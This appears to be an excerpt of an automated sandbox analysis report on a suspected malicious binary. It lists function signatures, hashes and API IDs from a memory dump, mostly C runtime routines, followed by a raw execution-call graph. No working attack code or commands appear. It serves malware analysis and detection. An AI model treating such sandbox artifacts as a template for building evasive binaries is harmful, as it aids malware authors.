                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E1FCB0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                  • String ID: leM
                                                                                                  • API String ID: 3569886845-2926266777
                                                                                                  • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction ID: ab0dce7edc6f4d2bcd60e0b2ae02f9648d309c394bd3b3b3669f7a759ae4b3dd
                                                                                                  • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction Fuzzy Hash: 9F11FE79D0020DBBCF04FFA5E859CDDBB7CAA04344F409566AD54AB280EB74E388CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc_wprintf$_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 3721157643-0
                                                                                                  • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction ID: 13b768c1280a9337e8751030d89c077c228639b8877b0a3e5b98611d79915575
                                                                                                  • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction Fuzzy Hash: 4511E7B67405546AC26167F59C15FFF7AECDF46711F09006BFB8DD2180DA185A0493B2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 65388428-0
                                                                                                  • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                  • Instruction ID: c2e7b81a522a980d0532425d4008bb849ce071f653afab51b45235319a4127e9
                                                                                                  • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                  • Instruction Fuzzy Hash: E2510B71E40219ABDB11EBE5DC8AFEFBBB8FB04744F140026FA05B6190E7745A05CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 217217746-0
                                                                                                  • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                  • Instruction ID: d567bc77c1af82fa88392436c20166774b25e8cb5a8a77d0c8e6aed807cad570
                                                                                                  • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                  • Instruction Fuzzy Hash: B85140B1E4020AAADF11DFA1DC46FEEBBB9FB05704F104026F906B6180D775AA05CBB5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 217217746-0
                                                                                                  • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction ID: 071e4257bc784185cb25e2545240aa414108f1db3e96858c4f7bb9b2e23e6b38
                                                                                                  • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction Fuzzy Hash: 62514071E40209AADF15DFA1DC85FFEBBB9FB04744F10012AF906B7180E674AA058BB5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3534693527-0
                                                                                                  • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction ID: c22b1ee6395c3b76954d0a9eef23ed8fd4ed0f1aeccaa3ac51b05803e715708f
                                                                                                  • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction Fuzzy Hash: CB315B36B043116BEB21AF76DC04BAE3754EF05B68F165112EF46DF280DB74890083B9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 05E966DD
                                                                                                    • Part of subcall function 05DF59BF: __calloc_crt.LIBCMT ref: 05DF59E2
                                                                                                    • Part of subcall function 05DF59BF: __initptd.LIBCMT ref: 05DF5A04
                                                                                                  • __calloc_crt.LIBCMT ref: 05E96700
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 05E9671E
                                                                                                  • __invoke_watson.LIBCMT ref: 05E9673B
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 05E9676D
                                                                                                  • __invoke_watson.LIBCMT ref: 05E9678B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                  • String ID:
                                                                                                  • API String ID: 4066021419-0
                                                                                                  • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction ID: 1fec9a1761d762992e0b131a9d36dbb0d04c30d38429edd9656baa809bebc208
                                                                                                  • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction Fuzzy Hash: 6111C1367042186BFF296B259C04EBB739DEF006A8F021427FE88EA241E721DD0043E4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: D
                                                                                                  • API String ID: 2102423945-2746444292
                                                                                                  • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                  • Instruction ID: ec8277efa732cc09819857d5cdae6b7a3e37bf67966dba7dd63488451dd868e6
                                                                                                  • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                  • Instruction Fuzzy Hash: 64E16E75D40219EBDF24EBA0CD89FEEB7BCBF04304F14406AE509A6190EB74AA45CF64
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: $$$(
                                                                                                  • API String ID: 2102423945-3551151888
                                                                                                  • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                  • Instruction ID: 4a2aa44cf91ce9eddc648e3b072d552fe0e8780e72f4c68305a23692dbb0d01a
                                                                                                  • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                  • Instruction Fuzzy Hash: 20919E71D00218EAEF21EFA4CC59BEEBBB5EF05308F14416AD505772C0DBB65A48CB65
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnlen
                                                                                                  • String ID: U
                                                                                                  • API String ID: 3628947076-3372436214
                                                                                                  • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction ID: c9d0fdab938489cec948ffb3a31db8ae209554e7e697fc210fc138df30f4a2f1
                                                                                                  • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction Fuzzy Hash: 3921D8326192087AEB00DBA4FC49FBA739DEB45650F524167FB49C6190FA71EA4087A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: p2Q
                                                                                                  • API String ID: 2102423945-1521255505
                                                                                                  • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                  • Instruction ID: 984ceb362d95c0ce49f8360e863073572cbb67a2117976e8b0d254fff725bf9a
                                                                                                  • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                  • Instruction Fuzzy Hash: 69F0E578694750A5F7117750FC2A7957E917B31B04F104045D1142E3E1D3FD234C679A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 05E1FBF1
                                                                                                    • Part of subcall function 05E0169C: std::exception::_Copy_str.LIBCMT ref: 05E016B5
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E1FC06
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                  • String ID: TeM$TeM
                                                                                                  • API String ID: 3662862379-3870166017
                                                                                                  • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction ID: 749fa8b4feedc4093f1804413be87e79373e968ebd723e486d12a33d4e3752de
                                                                                                  • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction Fuzzy Hash: 78D06775D0020DBBCB04EFA5E859CDDBBBCAA04344B009466A954AB281EA74E389CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 05DF197D: __wfsopen.LIBCMT ref: 05DF1988
                                                                                                  • _fgetws.LIBCMT ref: 05DDD15C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wfsopen_fgetws
                                                                                                  • String ID:
                                                                                                  • API String ID: 853134316-0
                                                                                                  • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                  • Instruction ID: 08670f0e3003e28eaea87e60498eb750eb77404c9e141b2682450f72ba5a3f1b
                                                                                                  • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                  • Instruction Fuzzy Hash: A6917071D00219ABCF21EFA4CD45BAEFBB6FF04304F15052AE955A3240E775AA04CBB5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$__except_handler4_fprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 1783060780-0
                                                                                                  • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                  • Instruction ID: 36c0fafda607eef209d01a83b1e20d58f941caaa1a3ae45994162c2efb598985
                                                                                                  • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                  • Instruction Fuzzy Hash: 99A17AB1D00258EBEF11EFA4CC49BDEBBB5EF15304F140029D5057B291E7B65A88CBA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2974526305-0
                                                                                                  • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                  • Instruction ID: 4a10fb98c7b72b75c7a37646fa861fb37a927b728cc4404d498effeb20448add
                                                                                                  • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                  • Instruction Fuzzy Hash: 1551C038A043059BDB24CFA98C846AE77B6FF40325F16832BEE76D62D4D7709950CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction ID: cf8bccc9b088b48a65d9bda1e5686f15482facb05c2c6dbd4fb5035fdfd75902
                                                                                                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction Fuzzy Hash: 19017B3280414EFBCF1A5E84DC05CEE3F63BB18254B499415FF9998434D232C5B2EB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 05E97A4B
                                                                                                    • Part of subcall function 05E98140: ___BuildCatchObjectHelper.LIBCMT ref: 05E98172
                                                                                                    • Part of subcall function 05E98140: ___AdjustPointer.LIBCMT ref: 05E98189
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 05E97A62
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 05E97A74
                                                                                                  • CallCatchBlock.LIBCMT ref: 05E97A98
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2901542994-0
                                                                                                  • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction ID: eb38ba561d13aeefb9fe04b331f0eeffc388a203794381d1731dd4738a8dafd3
                                                                                                  • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction Fuzzy Hash: 24016532500108BBDF16AF95CC04EEE3BBAFF49758F009015FE8862120C372E9A1DBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:37%
                                                                                                  Total number of Nodes:805
                                                                                                  Total number of Limit Nodes:91
calls 44651->45025 45026 44f23e 59 API calls 2 library calls 44652->45026 44658->44188 44661 414690 59 API calls 44660->44661 44662 415c60 44661->44662 44662->44188 44663->44190 44664->44193 44665->44199 44666->44209 44668 413a90 59 API calls 44667->44668 44669 41294c MultiByteToWideChar 44668->44669 44670 418400 59 API calls 44669->44670 44671 41298d 44670->44671 44671->44212 44672->44217 44673->44225 44674->44231 44675->44235 44676->44239 44677->44243 44678->44247 44679->44251 44680->44255 44681->44257 44682->44259 44683->44261 44684->44263 44685->44265 44686->44267 44687->44269 44688->44271 44689->44273 44690->44275 44691->44277 44692->44279 44693->44281 44694->44283 44695->44285 44696->44287 44698 412c71 44697->44698 44699 412c5f 44697->44699 44702 4156d0 59 API calls 44698->44702 44700 4156d0 59 API calls 44699->44700 44701 412c6a 44700->44701 44701->44292 44703 412c8a 44702->44703 44703->44292 44704->44294 44705->44317 44706->44317 44707->44317 44708->44298 44709->44300 44710->44303 44711->44306 44712->44309 44713->44311 44714->44314 44715->44319 44716->44321 44717->44345 44718->44345 44719->44345 44720->44345 44721->44345 44722->44345 45027 41f130 218 API calls _LangCountryEnumProc@4 44722->45027 44723->44325 45028 41fd80 64 API calls 44723->45028 44727 415735 44726->44727 44728 4156de 44726->44728 44729 4157bc 44727->44729 44730 41573e 44727->44730 44728->44727 44737 415704 44728->44737 44750 44f23e 59 API calls 2 library calls 44729->44750 44733 415750 __expandlocale 44730->44733 44749 416760 59 API calls 2 library calls 44730->44749 44733->44409 44739 415709 44737->44739 44740 41571f 44737->44740 44747 413ff0 59 API calls __expandlocale 44739->44747 44748 413ff0 59 API calls __expandlocale 44740->44748 44743 415719 44743->44409 44744 41572f 44744->44409 44745->44413 44746->44415 44747->44743 44748->44744 44749->44733 44757 423b4c 44751->44757 44753 41ccca 44756 41a00a 44753->44756 44767 44f1bb 59 API calls 3 library calls 44753->44767 44756->44102 
44756->44103 44759 423b54 44757->44759 44758 420c62 _malloc 58 API calls 44758->44759 44759->44758 44760 423b6e 44759->44760 44762 423b72 std::exception::exception 44759->44762 44768 42793d DecodePointer 44759->44768 44760->44753 44769 430eca RaiseException 44762->44769 44764 423b9c 44770 430d91 58 API calls _free 44764->44770 44766 423bae 44766->44753 44768->44759 44769->44764 44770->44766 44772 423b4c 59 API calls 44771->44772 44773 41cc5d 44772->44773 44774 41cc64 44773->44774 44778 44f1bb 59 API calls 3 library calls 44773->44778 44774->44422 44777 41d740 59 API calls 44774->44777 44777->44422 44781->44439 44782->44439 44786 431570 44783->44786 44787 431580 44786->44787 44788 431586 44787->44788 44793 4315ae 44787->44793 44797 425208 58 API calls __getptd_noexit 44788->44797 44790 43158b 44798 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44790->44798 44796 4315cf wcstoxl 44793->44796 44799 42e883 GetStringTypeW 44793->44799 44794 41a36e lstrcpyW lstrcpyW 44794->44136 44796->44794 44800 425208 58 API calls __getptd_noexit 44796->44800 44797->44790 44798->44794 44799->44793 44800->44794 44802 411cf2 RegOpenKeyExW 44801->44802 44802->44446 44802->44470 44803->44455 44804->44473 44806 420241 44805->44806 44807 4202b6 44805->44807 44814 420266 44806->44814 44815 425208 58 API calls __getptd_noexit 44806->44815 44817 4202c8 60 API calls 3 library calls 44807->44817 44810 4202c3 44810->44493 44811 42024d 44816 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44811->44816 44813 420258 44813->44493 44814->44493 44815->44811 44816->44813 44817->44810 44818->44519 44819->44520 44820->44513 44823->44539 44824->44540 44825->44527 44826->44529 44829 423b4c 59 API calls 44828->44829 44830 40b164 44829->44830 44831 40b177 SysAllocString 44830->44831 44832 40b194 44830->44832 44831->44832 44832->44556 44834 40b1de 44833->44834 44836 40b202 44833->44836 44835 40b1f5 SysFreeString 44834->44835 44834->44836 44835->44836 44836->44558 44838 423add __aulldiv 
44837->44838 44838->44595 44852 43035d 44839->44852 44841 42355a 44843 40d78f 44841->44843 44860 423576 44841->44860 44844 4228e0 44843->44844 44964 42279f 44844->44964 44848 40b423 44847->44848 44849 40b41d 44847->44849 44850 40b42d VariantClear 44848->44850 44849->44617 44850->44617 44851->44569 44893 42501f 58 API calls 4 library calls 44852->44893 44854 430363 44855 430369 44854->44855 44856 43038d 44854->44856 44895 428cde 58 API calls 2 library calls 44854->44895 44855->44856 44894 425208 58 API calls __getptd_noexit 44855->44894 44856->44841 44859 43036e 44859->44841 44861 423591 44860->44861 44862 4235a9 _memset 44860->44862 44904 425208 58 API calls __getptd_noexit 44861->44904 44862->44861 44869 4235c0 44862->44869 44864 423596 44905 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44864->44905 44866 4235cb 44906 425208 58 API calls __getptd_noexit 44866->44906 44867 4235e9 44896 42fb64 44867->44896 44869->44866 44869->44867 44871 4235ee 44907 42f803 58 API calls __write_nolock 44871->44907 44873 4235f7 44874 4237e5 44873->44874 44908 42f82d 58 API calls __write_nolock 44873->44908 44921 4242fd 8 API calls 2 library calls 44874->44921 44877 4237ef 44878 423609 44878->44874 44909 42f857 44878->44909 44880 42361b 44880->44874 44881 423624 44880->44881 44882 42369b 44881->44882 44884 423637 44881->44884 44919 42f939 58 API calls 4 library calls 44882->44919 44916 42f939 58 API calls 4 library calls 44884->44916 44885 4236a2 44892 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 44885->44892 44920 42fbb4 58 API calls 4 library calls 44885->44920 44887 42364f 44887->44892 44917 42fbb4 58 API calls 4 library calls 44887->44917 44890 423668 44890->44892 44918 42f939 58 API calls 4 library calls 44890->44918 44892->44843 44893->44854 44894->44859 44895->44855 44897 42fb70 __wsopen_helper 44896->44897 44898 42fba5 __wsopen_helper 44897->44898 44899 428af7 __lock 58 API calls 44897->44899 44898->44871 44900 42fb80 44899->44900 44903 42fb93 
44900->44903 44922 42fe47 44900->44922 44951 42fbab LeaveCriticalSection _doexit 44903->44951 44904->44864 44905->44892 44906->44892 44907->44873 44908->44878 44910 42f861 44909->44910 44911 42f876 44909->44911 44962 425208 58 API calls __getptd_noexit 44910->44962 44911->44880 44913 42f866 44963 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44913->44963 44915 42f871 44915->44880 44916->44887 44917->44890 44918->44892 44919->44885 44920->44892 44921->44877 44923 42fe53 __wsopen_helper 44922->44923 44924 428af7 __lock 58 API calls 44923->44924 44925 42fe71 __tzset_nolock 44924->44925 44926 42f857 __tzset_nolock 58 API calls 44925->44926 44927 42fe86 44926->44927 44942 42ff25 __tzset_nolock 44927->44942 44952 42f803 58 API calls __write_nolock 44927->44952 44930 42fe98 44930->44942 44953 42f82d 58 API calls __write_nolock 44930->44953 44931 42ff71 GetTimeZoneInformation 44931->44942 44934 42feaa 44934->44942 44954 433f99 58 API calls 2 library calls 44934->44954 44936 42ffd8 WideCharToMultiByte 44936->44942 44937 42feb8 44955 441667 78 API calls 3 library calls 44937->44955 44938 430010 WideCharToMultiByte 44938->44942 44941 42ff0c _strlen 44957 428cde 58 API calls 2 library calls 44941->44957 44942->44931 44942->44936 44942->44938 44943 430157 __tzset_nolock __wsopen_helper 44942->44943 44949 43ff8e 58 API calls __tzset_nolock 44942->44949 44950 423c2d 61 API calls __tzset_nolock 44942->44950 44959 4242fd 8 API calls 2 library calls 44942->44959 44960 420bed 58 API calls 2 library calls 44942->44960 44961 4300d7 LeaveCriticalSection _doexit 44942->44961 44943->44903 44945 42fed9 __tzset_nolock 44945->44941 44945->44942 44956 420bed 58 API calls 2 library calls 44945->44956 44946 42ff1a _strlen 44946->44942 44958 42c0fd 58 API calls __write_nolock 44946->44958 44949->44942 44950->44942 44951->44898 44952->44930 44953->44934 44954->44937 44955->44945 44956->44941 44957->44946 44958->44942 44959->44942 44960->44942 44961->44942 44962->44913 44963->44915 44991 
